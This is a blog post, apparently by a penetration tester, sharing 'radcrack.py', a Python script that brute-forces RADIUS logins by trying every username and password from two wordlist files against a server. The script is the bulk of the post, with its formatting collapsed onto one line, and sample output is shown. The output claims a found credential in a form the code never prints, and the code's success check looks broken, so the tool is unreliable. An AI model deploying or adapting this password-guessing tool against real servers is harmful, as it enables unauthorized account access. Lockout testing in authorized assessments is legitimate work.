RADIUS Brute-Force Tool

I was doing an assessment of an authentication solution using the RADIUS protocol and found the need to verify if there was a lock-out policy enforced. Also to verify my suspicions that one-time passwords were not used on all accounts.

Lock-out policies are useful and truly are a good countermeasure against bruteforce attacks. Also delaying an Access-Reject in the RADIUS server even just for a second causes the bruteforce attack to render useless since it takes too long.

Starting to investigate and browsing the web for a RADIUS Brute-force tool but i could not find one.

radclient which ships with FreeRADIUS can surely be used in combination with bash or shell scripting.

I found Pyrad which was exactly what i was after.
A RADIUS packet creator in python!

So i started to look at the examples and combining functionality.

This is what i came up with

radcrack.py

#!/usr/bin/env python # # mpentest (at) gmail.com 2012-12-21 # # RADIUS Brute-Force Tool # # Pre-requisites: Pyrad # Download from https://github.com/wichert/pyrad # # # Usage: ./radcrack.py userfile passfile # # radcrack.py reads usernames and passwords from files specified as command line arguments # import socket import sys import pyrad.packet from pyrad.client import Client, Timeout from pyrad.dictionary import Dictionary if len(sys.argv) != 3: print "Usage: ./radcrack.py /path/to/username/file /path/to/password/file" sys.exit() usernames = open(sys.argv[1], "r").readlines() passwords = open(sys.argv[2], "r").readlines() index = 0 while index < len(usernames): usernames[index] = usernames[index].replace("\n", "") index += 1 index = 0 while index < len(passwords): passwords[index] = passwords[index].replace("\n", "") index += 1 def radcrack(userlist, passlist): # Define radcrack function print "Attacking target..." for user in userlist: # Loop through users print (user) # Print username to stdout before attack for passwd in passlist: # Loop through passwords # Create RADIUS packet srv=Client(server="localhost", authport=1812, secret="testing123", dict=Dictionary("/pentest/wireless/freeradius-wpe/share/dictionary.rfc2865")) req=srv.CreateAuthPacket(code=pyrad.packet.AccessRequest, User_Name=user) req["User-Password"]=req.PwCrypt(passwd) req["NAS-Port"] = 0 req["Service-Type"] = "Login-User" srv.retries=3 srv.timeout=2 try: # print "Sending authentication request" reply=srv.SendPacket(req) except pyrad.client.Timeout: print "RADIUS server does not reply" sys.exit(1) except socket.error, error: print "Network error: " + error[1] sys.exit(1) # print (reply.keys) # Print reply packet # if reply.code==pyrad.packet.AccessAccept: # if Access-Accept # if reply.code==pyrad.packet.AccessChallenge: # if Access-Challenge # print ("Password Found: " + str(user) + "," + str(passwd)) # Print username,password # else: # print "Access denied" # print "Attributes returned by server:" for i in reply.keys(): # Loop through reply keys if "service temporary down" in str(reply.keys): # Print if reply contains print ("Password Found: " + str(user) + "," + str(passwd)) # Print username,password # print "%s: %s" % (i, reply[i]) # More verbose radcrack(usernames, passwords)


The output:

# ./radcrack.py userfile passfile
Attacking target...
Sending authentication request User-Name: admin
Access accepted: admin,password


To note:
A RADIUS server needs the following for this to apply.
- Shared secret configured must match the client (attacker) and the server
- Source IP-address needs to match.

Hope you find it useful as i did.
The code includes comments that can aid in troubleshooting and as examples, that is why i left them there, i am also using the freeradius dictionary.

/M